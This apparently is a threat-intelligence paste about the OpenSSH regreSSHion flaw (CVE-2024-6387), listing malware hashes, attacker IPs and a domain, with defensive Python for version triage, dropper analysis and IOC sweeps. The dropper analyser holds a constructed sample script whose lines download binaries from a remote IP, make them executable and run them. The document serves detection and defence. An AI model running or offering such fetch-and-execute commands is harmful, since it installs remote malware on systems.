JustPaste.it

RegreSSHion Vulnerability IOCs: CVE-2024-6387

📌OpenSSH has a vulnerability (CVE-2024-6387, "regreSSHion", a signal-handler race in sshd) which is being exploited in the wild. The affected builds are OpenSSH 8.5p1 up to but not including 9.8p1 on glibc-based Linux (plus releases older than 4.4p1); 9.8p1 carries the fix.
📌Found a few malicious scripts/files that are involved in the attack.
💡A Go agent was detected; it is the one used in the CHAOS RAT project.
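A quick way to triage which hosts still need patching is to read the sshd version banner and compare it with the affected range. The block below is an added example, not code from the original post: the version range it encodes is the publicly documented one for CVE-2024-6387, while grab_banner, assess_banner and the sample banners are this example's own. The catch it handles: distributions backport the fix without changing the upstream version string, so "affected" from the banner means "check the package changelog", not "exploitable".

```python
"""Classify an sshd banner against the CVE-2024-6387 affected version range.
Added example, not from the original post. Range used: OpenSSH 8.5p1 up to but
not including 9.8p1, plus releases before 4.4p1 (the publicly documented range).
The banner cannot tell you the OS (OpenBSD is not affected) or whether a distro
backported the fix, so 'affected' here means 'verify', not 'exploitable'."""
import re
import socket
from typing import Optional, Tuple

BANNER_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)(?:p(\d+))?")
Version = Tuple[int, int, int]


def parse_openssh_version(banner: str) -> Optional[Version]:
    """Return (major, minor, portable_patch) from a banner such as
    'SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.4'; None if it is not OpenSSH.
    A missing 'pN' suffix (non-portable builds) is treated as patch 0."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def version_in_affected_range(v: Version) -> bool:
    """8.5p1 <= v < 9.8p1 (the regressed range) or anything before 4.4p1."""
    return v < (4, 4, 1) or (8, 5, 1) <= v < (9, 8, 0)


def assess_banner(banner: str) -> str:
    """'affected', 'not affected', or 'unknown' for a non-OpenSSH banner.
    'affected' means the upstream version is in range; confirm against the
    distro package changelog before treating the host as exploitable."""
    v = parse_openssh_version(banner)
    if v is None:
        return "unknown"
    return "affected" if version_in_affected_range(v) else "not affected"


def grab_banner(host: str, port: int = 22, timeout: float = 3.0) -> str:
    """Read the server identification line (RFC 4253 section 4.2). Network call;
    the server sends its banner first, so no client data is needed."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        data = s.recv(256)
    return data.decode("ascii", "replace").split("\r\n")[0]


if __name__ == "__main__":
    # Constructed banners (assumed values, not observed ones).
    for b in ("SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.4",
              "SSH-2.0-OpenSSH_9.8p1",
              "SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3",
              "SSH-2.0-dropbear_2022.83"):
        print(f"{b:45s} -> {assess_banner(b)}")
```

Pair the banner result with the package version (dpkg -l openssh-server, rpm -q openssh-server) before filing a host as vulnerable; Ubuntu 24.04, for instance, kept the 9.6p1 banner after the fix was backported.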


Bash Script used in RegreSSHion 
=====================
📌The script begins by downloading 12 files from a remote server, each with a different file extension (in Mirai-style droppers this is normally one build of the same bot per target architecture).
📌It then changes the permissions of each downloaded file to make it executable.
📌Finally, it executes each downloaded file.
📌The script performs no integrity check (no hash or signature verification) on the downloaded files before executing them, so whatever the server serves at that moment is run, and the payloads can be swapped server-side without touching the script.
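As an added example (not the script from the post), here is a small static triage routine for the download, chmod, execute sequence described above. SAMPLE_DROPPER is a constructed four-file script that mimics that behaviour; analyze_dropper and the other names are this example's own. It flags the pattern, notes the absence of any integrity check, and pulls the download hosts out as IOC candidates.

```python
"""Static triage of a shell dropper: flag the download -> chmod +x -> execute
sequence with no integrity check, and pull the remote hosts out as IOC candidates.
Added example, not the script from the original post; SAMPLE_DROPPER is
constructed to mirror the behaviour described above (shortened to four files)."""
import posixpath
import re
from typing import Dict, List, Optional

DOWNLOADER_RE = re.compile(r"^(?:wget|curl|tftp|ftpget)\b")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://([\w.\-]+)(?::\d+)?(/\S*)?")
OUTPUT_RE = re.compile(r"-[oO]\s+(\S+)")          # wget -O / curl -o target name
CHMOD_RE = re.compile(r"^chmod\s+(\S+)\s+(\S+)")
EXEC_RE = re.compile(r"^(?:\./|(?:sh|bash|/bin/sh)\s+(?:\./)?)(\S+)")
INTEGRITY_RE = re.compile(r"\b(?:sha256sum|sha1sum|md5sum|gpg|cosign)\b|openssl\s+dgst")

SAMPLE_DROPPER = """#!/bin/sh
# constructed sample; 198.51.100.0/24 is the RFC 5737 documentation range
cd /tmp || cd /var/run || cd /dev/shm
wget http://198.51.100.10/bins/x86 -O x86; chmod +x x86; ./x86
wget http://198.51.100.10/bins/x86_64 -O x86_64; chmod +x x86_64; ./x86_64
wget http://198.51.100.10/bins/arm7 -O arm7; chmod 777 arm7; ./arm7
curl -s http://198.51.100.10/bins/mips -o mips; chmod +x mips; ./mips
rm -f x86 x86_64 arm7 mips
"""


def split_statements(script: str) -> List[str]:
    """Break the script on newlines, ';', '&&' and '||' and drop comments."""
    out = []
    for raw in re.split(r"\n|;|&&|\|\|", script):
        s = raw.strip()
        if s and not s.startswith("#"):
            out.append(s)
    return out


def grants_exec(mode: str) -> bool:
    """True if a chmod mode adds an execute bit (symbolic +x or an odd octal digit)."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "+" in mode and "x" in mode


def output_name(stmt: str, url) -> Optional[str]:
    """Name the download lands under: explicit -O/-o, else the URL's basename."""
    m = OUTPUT_RE.search(stmt)
    if m:
        return m.group(1)
    if url and url.group(2):
        return posixpath.basename(url.group(2))
    return None


def analyze_dropper(script: str) -> Dict[str, object]:
    hosts, downloaded, made_exec, executed = set(), [], [], []
    for s in split_statements(script):
        if DOWNLOADER_RE.match(s):
            url = URL_RE.search(s)
            if url:
                hosts.add(url.group(1))
            name = output_name(s, url)
            if name:
                downloaded.append(name)
            continue
        cm = CHMOD_RE.match(s)
        if cm:
            if grants_exec(cm.group(1)):
                made_exec.append(cm.group(2))
            continue
        em = EXEC_RE.match(s)
        if em:
            executed.append(em.group(1))
    # The dropper signature: something fetched from the network is executed,
    # and nothing in the script verified it first.
    executed_downloads = [n for n in executed if n in downloaded]
    integrity = bool(INTEGRITY_RE.search(script))
    dropper = bool(executed_downloads) and not integrity
    return {
        "remote_hosts": sorted(hosts),
        "downloaded": downloaded,
        "made_executable": made_exec,
        "executed_downloads": executed_downloads,
        "integrity_check": integrity,
        "verdict": "likely dropper" if dropper else "no dropper pattern",
    }


if __name__ == "__main__":
    for k, v in analyze_dropper(SAMPLE_DROPPER).items():
        print(f"{k}: {v}")
```

The remote_hosts field is the part worth feeding straight into a block list or a log search; the rest is there so an analyst can see why the verdict was reached.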


📌Here is the list of MD5 hashes of the malicious scripts/files found along with the CVE-2024-6387 RegreSSHion vulnerability:


1f452448cea986aedc88ba50d48691f7
f88f1c803432b72243da85089264bc92
41fc3137fe26d26f72c7d6c48dae8f36
c2e368e608090479ceb4bc9ce6e45081
f1605ee67da4359d523697d61e380d69
f01b45a5bea298b837db3af8c5bad744
35baf8244b9e96bae7a9a97df0c61188
2be087e54204a6c395e05516c53fd579
639b0503927108085f2a03de0383da5f
536b6c9024361ab349363a6a55c2a2b8
0df799f05c6d97e2b7d4b26c8e7246f7
11cc5f00b466d4f9be4e0a46f2eb51ae
207eb58423234306edaecb3ec89935d8
34dbec1fdbd5eb161788b3ddab78d914


📌All of these files were first spotted on 2 July 2024.


☢️High Confidence IOC
================
📍209.141.53.247 🇺🇸
📍195.85.205.47 🇹🇷
📍62.72.191.203 🇹🇷
📍botbot.ddosvps.cc

💡This infrastructure was previously used by Agent Tesla.
💡It was also used to carry out Apache Log4j RCE attacks.


Average Confidence IPs
======================

108.174.58.28
34.243.160.129
34.254.182.186
54.171.230.55
54.217.10.153
54.247.62.1
109.202.202.202
91.189.91.43
91.189.91.42


💡Most of the IPs observed in connection with these malicious files are already associated with botnets such as Mirai, Gafgyt and Okiru. Treat the average-confidence addresses as leads rather than block-list entries until the traffic has been confirmed: some of them sit in public-cloud address ranges that ordinary servers contact for legitimate reasons, so a single hit on one of them is not proof of compromise.
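Putting the hash, IP and domain lists to use: the added example below (not from the original post) hashes files under a directory against the MD5 list and matches log tokens against the IP and domain lists. The indicator values are copied from this page; the SAMPLE_LOG lines are constructed; the function names are this example's own. It also counts sshd "Timeout before authentication" messages per source address, because the exploit works by racing sshd's LoginGraceTime handler, so repeated timeouts from one address are a cheap signal to pair with the IOC hits.

```python
"""Sweep a host for the indicators listed above: MD5 of files on disk against
the hash list, and sshd/DNS log tokens against the IP and domain lists.
Added example, not code from the original post; indicator values are copied
from the page, SAMPLE_LOG is constructed."""
import hashlib
import os
from collections import Counter
from typing import Dict, List, Tuple

# 14 unique MD5s (the post lists one of them twice).
IOC_MD5 = set("""
1f452448cea986aedc88ba50d48691f7 f88f1c803432b72243da85089264bc92
41fc3137fe26d26f72c7d6c48dae8f36 c2e368e608090479ceb4bc9ce6e45081
f1605ee67da4359d523697d61e380d69 f01b45a5bea298b837db3af8c5bad744
35baf8244b9e96bae7a9a97df0c61188 2be087e54204a6c395e05516c53fd579
639b0503927108085f2a03de0383da5f 536b6c9024361ab349363a6a55c2a2b8
0df799f05c6d97e2b7d4b26c8e7246f7 11cc5f00b466d4f9be4e0a46f2eb51ae
207eb58423234306edaecb3ec89935d8 34dbec1fdbd5eb161788b3ddab78d914
""".split())
IOC_HIGH = {"209.141.53.247", "195.85.205.47", "62.72.191.203", "botbot.ddosvps.cc"}
IOC_AVERAGE = {"108.174.58.28", "34.243.160.129", "34.254.182.186", "54.171.230.55",
               "54.217.10.153", "54.247.62.1", "109.202.202.202", "91.189.91.43",
               "91.189.91.42"}


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def md5_of_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def is_ioc_hash(digest: str) -> bool:
    return digest.lower() in IOC_MD5


def sweep_tree(root: str) -> List[Tuple[str, str]]:
    """Walk root (/tmp, /dev/shm, /var/run are the usual dropper working
    directories) and return (path, md5) for every file whose hash is listed."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = md5_of_file(path)
            except OSError:          # unreadable, vanished, or a special file
                continue
            if is_ioc_hash(digest):
                hits.append((path, digest))
    return hits


def classify(token: str) -> str:
    """'high', 'average' or '' for one IP/hostname token."""
    if token in IOC_HIGH:
        return "high"
    if token in IOC_AVERAGE:
        return "average"
    return ""


def scan_log(text: str) -> Dict[str, object]:
    """Match each whitespace token of every line against the indicator lists and
    count sshd 'Timeout before authentication' events per source address."""
    hits, timeouts = [], Counter()
    for n, line in enumerate(text.splitlines(), 1):
        seen = set()
        for tok in line.split():
            t = tok.strip("[](),;:\"'<>")
            conf = classify(t)
            if conf and t not in seen:
                seen.add(t)
                hits.append({"line": n, "indicator": t, "confidence": conf, "text": line})
        marker = "Timeout before authentication for "
        if marker in line:
            timeouts[line.split(marker, 1)[1].split()[0]] += 1
    return {"hits": hits, "grace_timeouts": dict(timeouts)}


# Constructed log lines in syslog/sshd format (assumed, not observed data).
SAMPLE_LOG = """Jul  2 03:14:15 srv1 sshd[2211]: Connection from 209.141.53.247 port 51234 on 10.0.0.5 port 22
Jul  2 03:14:16 srv1 sshd[2211]: Timeout before authentication for 209.141.53.247 port 51234
Jul  2 03:20:02 srv1 sshd[2290]: Accepted publickey for deploy from 34.243.160.129 port 40022 ssh2
Jul  2 03:21:40 srv1 sshd[2301]: Connection closed by 203.0.113.9 port 50000 [preauth]
Jul  2 03:25:11 srv1 dnsmasq[412]: query[A] botbot.ddosvps.cc from 10.0.0.5
"""

if __name__ == "__main__":
    result = scan_log(SAMPLE_LOG)
    for h in result["hits"]:
        print(f"[{h['confidence']}] line {h['line']}: {h['indicator']}")
    print("grace timeouts per source:", result["grace_timeouts"])
    for d in ("/tmp", "/dev/shm", "/var/run"):
        for path, digest in sweep_tree(d):
            print(f"IOC hash match: {path} {digest}")
```

Run the file sweep as root so /tmp and /dev/shm are fully readable, and feed scan_log the raw auth.log or journalctl -u ssh output. A "high" hit or a hash match is worth an incident ticket; an "average" hit is a lead to confirm first.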


#OpenSSH #infosec #exploit #SSH #Regresshion #threatintelligence #threatintel #security #OSINT #vulnerability #hack #cybersecurity